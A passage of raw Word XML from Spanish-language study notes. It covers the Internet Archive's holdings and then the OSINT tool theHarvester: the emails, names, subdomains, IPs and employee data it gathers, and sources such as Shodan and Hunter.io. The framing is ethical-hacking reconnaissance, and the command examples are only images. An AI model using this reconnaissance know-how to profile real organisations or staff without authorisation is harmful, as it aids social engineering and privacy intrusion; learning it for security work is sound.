          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC98C9D" wp14:editId="1F4D8DA7">
            <wp:extent cx="5351250" cy="1159933"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="19889426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26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58537" cy="11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7F3" w14:textId="77777777" w:rsidR="00427CA9" w:rsidRPr="00427CA9" w:rsidRDefault="00427CA9" w:rsidP="00427CA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00427CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MIS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7CA9" w14:paraId="45AA748D" w14:textId="77777777" w:rsidTr="00427CA9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E0B5C8" w14:textId="7ED8F6C5" w:rsidR="00427CA9" w:rsidRDefault="00427CA9" w:rsidP="00D013FF">
            <w:r w:rsidRPr="00427CA9">
              <w:t>"Acceso universal a todo el conocimiento"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E870758" w14:textId="1B7BBA37" w:rsidR="00427CA9" w:rsidRDefault="00427CA9" w:rsidP="00427CA9">
      <w:r w:rsidRPr="00427CA9">
        <w:t>Preservan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BFD11A" w14:textId="27CE90AB" w:rsidR="00427CA9" w:rsidRDefault="00427CA9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00427CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>866+ mil millones</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA9">
        <w:t xml:space="preserve"> de páginas web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D2ADD" w14:textId="0639FED2" w:rsidR="00427CA9" w:rsidRPr="00427CA9" w:rsidRDefault="00427CA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7CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>📚</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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427CA9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41+ millones</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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de libros </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E21543" w14:textId="238FD955" w:rsidR="00427CA9" w:rsidRPr="00427CA9" w:rsidRDefault="00427CA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7CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🎬</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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427CA9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10+ millones</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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de videos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C566EED" w14:textId="59A76E0E" w:rsidR="00427CA9" w:rsidRPr="00427CA9" w:rsidRDefault="00427CA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7CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🎵</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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427CA9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14+ millones</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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de archivos de audio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A036A" w14:textId="6F2B2C9F" w:rsidR="00427CA9" w:rsidRPr="00427CA9" w:rsidRDefault="00427CA9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00427CA9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>📀</w:t>
      </w:r>
      <w:r w:rsidRPr="00427CA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Software y videojuegos antiguos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B8377" w14:textId="77777777" w:rsidR="00FE7531" w:rsidRDefault="00FE7531" w:rsidP="00FE7531">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7531">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌍</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IMPORTANCIA LEGAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA4432" w14:textId="77777777" w:rsidR="00FE7531" w:rsidRPr="00FE7531" w:rsidRDefault="00FE7531">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7531">
        <w:t xml:space="preserve">Reconocida como </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>biblioteca oficial</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7531">
        <w:t xml:space="preserve"> por el estado de California </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37CDD4" w14:textId="77777777" w:rsidR="00FE7531" w:rsidRPr="00FE7531" w:rsidRDefault="00FE7531">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7531">
        <w:t xml:space="preserve">Protegida por leyes de "fair use" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17109871" w14:textId="245ACB59" w:rsidR="004155A9" w:rsidRPr="00FE7531" w:rsidRDefault="00FE7531">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7531">
        <w:t>Constantemente en batallas legales con editoriales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F0A05" w14:textId="4310F4AF" w:rsidR="004155A9" w:rsidRDefault="00FE7531" w:rsidP="003860AC">
      <w:r w:rsidRPr="00FE7531">
        <w:t xml:space="preserve">Es una </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ONG sin fines de lucro</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7531">
        <w:t xml:space="preserve"> que actúa como biblioteca digital de Internet, independiente del gobierno y empresas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51440D86" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="19BFDBFD" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="4426C0B8" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="56F40848" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="5B9D5165" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="2021BFC4" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="622C7160" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="346EAA53" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="64F4CB1B" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="6564C575" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="777563A6" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="6AEB5662" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="68F4E68D" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="53160D18" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="003860AC"/>
    <w:p w14:paraId="497AC1AC" w14:textId="42E07FB6" w:rsidR="002E6DB1" w:rsidRPr="008126F8" w:rsidRDefault="002E6DB1" w:rsidP="002E6DB1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008126F8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.9 </w:t>
      </w:r>
      <w:r w:rsidRPr="008126F8">
        <w:rPr>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14510B6B" w14:textId="5C5E9D76" w:rsidR="00063987" w:rsidRDefault="00416FE9" w:rsidP="00B7549E">
      <w:r w:rsidRPr="00063987">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester = </w:t>
      </w:r>
      <w:r w:rsidR="00063987" w:rsidRPr="00063987">
        <w:t>Herramienta</w:t>
      </w:r>
      <w:r w:rsidRPr="00063987">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidRPr="00063987">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT </w:t>
      </w:r>
      <w:r w:rsidRPr="00063987">
        <w:t xml:space="preserve">(Open Source Intelligence) que recopila </w:t>
      </w:r>
      <w:r w:rsidR="00063987" w:rsidRPr="00063987">
        <w:t>informacion publ</w:t>
      </w:r>
      <w:r w:rsidR="00063987">
        <w:t>ica sobre un objetivo desde múltiples fuentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52501607" w14:textId="77777777" w:rsidR="00804D75" w:rsidRPr="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00804D75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00804D75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ¿QUÉ RECOPIL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4D75" w14:paraId="6222BE6F" w14:textId="77777777" w:rsidTr="00804D75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362CE8F3" w14:textId="77777777" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📧</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Emails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F19302" w14:textId="77777777" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>👤</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Nombres de personas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A1A0AD" w14:textId="77777777" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🌐</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Subdominios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749DC484" w14:textId="77777777" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔢</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IPs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6388FA95" w14:textId="77777777" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔗</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> URLs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCDFAFD" w14:textId="1901FF12" w:rsidR="00804D75" w:rsidRDefault="00804D75" w:rsidP="00804D75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🏢</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Información de empleados (LinkedIn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7864DFEC" w14:textId="77777777" w:rsidR="00063987" w:rsidRDefault="00063987" w:rsidP="00B7549E"/>
    <w:p w14:paraId="0A04ED56" w14:textId="60AE1F63" w:rsidR="00063987" w:rsidRDefault="00827EF2" w:rsidP="00B7549E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827EF2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00827EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> FUENTES QUE U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7EF2" w14:paraId="16486C38" w14:textId="77777777" w:rsidTr="00827EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A93A8BA" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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Google</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBCF09E" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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Bing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2467996B" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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LinkedIn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3575644E" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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Shodan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7395D448" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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Censys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FDC717" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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Hunter.io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03CB9DCB" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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VirusTotal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35711F75" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2"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DNSdumpster</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BE25E4C" w14:textId="4FD09382" w:rsidR="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00827EF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00827EF2">
              <w:t xml:space="preserve"> Y 40+ más...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AAA6E05" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00B7549E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D002952" w14:textId="77777777" w:rsidR="00827EF2" w:rsidRPr="00827EF2" w:rsidRDefault="00827EF2" w:rsidP="00827EF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827EF2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00827EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO DE USO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289634A" w14:textId="33BAD8B4" w:rsidR="00063987" w:rsidRDefault="009E49C8" w:rsidP="00B7549E">
      <w:r w:rsidRPr="009E49C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2218313B" wp14:editId="7EB08CF8">
            <wp:extent cx="5521036" cy="1944632"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1265645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4550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25545" cy="19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B8A0" w14:textId="77777777" w:rsidR="009E49C8" w:rsidRPr="009E49C8" w:rsidRDefault="009E49C8" w:rsidP="009E49C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E49C8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r w:rsidRPr="009E49C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RESULTADO TÍPICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7D542" w14:textId="73978A3B" w:rsidR="009E49C8" w:rsidRDefault="009E49C8" w:rsidP="00B7549E">
      <w:r w:rsidRPr="009E49C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179EEEED" wp14:editId="578CE377">
            <wp:extent cx="5008771" cy="2736273"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="20191736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3625" name="Imagen 1" descr="Interfaz de usuario gráfica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12247" cy="27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C8F2" w14:textId="77777777" w:rsidR="00971621" w:rsidRPr="00971621" w:rsidRDefault="00971621" w:rsidP="00971621">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> USO EN HACKING ÉTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636F0A1" w14:textId="77777777" w:rsidR="00971621" w:rsidRPr="00971621" w:rsidRDefault="00971621" w:rsidP="00971621">
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fase de reconocimiento:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA3DDC" w14:textId="75892868" w:rsidR="00971621" w:rsidRDefault="00971621" w:rsidP="00B7549E">
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E0075B" wp14:editId="20C55977">
            <wp:extent cx="5086350" cy="1101572"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13462505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505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94337" cy="1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757F" w14:textId="77777777" w:rsidR="00971621" w:rsidRPr="00971621" w:rsidRDefault="00971621" w:rsidP="00971621">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00971621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO PRÁCTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2155F2DC" w14:textId="76ED3EA2" w:rsidR="009E49C8" w:rsidRDefault="00671832" w:rsidP="00B7549E">
      <w:r w:rsidRPr="00671832">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0688CE8E" wp14:editId="00DA50B8">
            <wp:extent cx="5143500" cy="1795463"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12085884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884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1981" cy="17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C79D" w14:textId="77777777" w:rsidR="00063987" w:rsidRDefault="00063987" w:rsidP="00B7549E"/>
    <w:p w14:paraId="421F9F83" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="2A26CD5F" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="265F0B66" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="219F8676" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="208CD2BC" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="3F8A0DA7" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="16BE7D51" w14:textId="77777777" w:rsidR="00854D1B" w:rsidRDefault="00854D1B" w:rsidP="00B7549E"/>
    <w:p w14:paraId="010919C6" w14:textId="5BC38C91" w:rsidR="00063987" w:rsidRPr="00063987" w:rsidRDefault="00063987" w:rsidP="00063987">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063987">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.1 ¿Qué es OSINT?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A192E0" w14:textId="77777777" w:rsidR="00B7549E" w:rsidRPr="00063987" w:rsidRDefault="00B7549E" w:rsidP="00B754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2D0B" w14:paraId="0B3DF292" w14:textId="77777777" w:rsidTr="00A82D0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CAD53BE" w14:textId="77777777" w:rsidR="00A82D0B" w:rsidRPr="00A82D0B" w:rsidRDefault="00A82D0B" w:rsidP="00A82D0B">
            <w:r w:rsidRPr="00A82D0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OSINT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A82D0B">
              <w:t xml:space="preserve"> significa </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82D0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Open Source Intelligence</w:t>
            </w:r>
            <w:r w:rsidRPr="00A82D0B">
              <w:t xml:space="preserve">, o </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82D0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Inteligencia de Fuentes Abiertas</w:t>
            </w:r>
            <w:r w:rsidRPr="00A82D0B">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232077E7" w14:textId="77777777" w:rsidR="00A82D0B" w:rsidRDefault="00A82D0B" w:rsidP="002E6DB1">
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">En términos simples, es la </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">recolección y análisis de información publica </w:t>
            </w:r>
            <w:r>
              <w:t>(disponible en internet o medios abiertos) para obtener inteligencia útil.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47928AB3" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="002E6DB1"/>
          <w:p w14:paraId="62EAC217" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="000C4AB0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
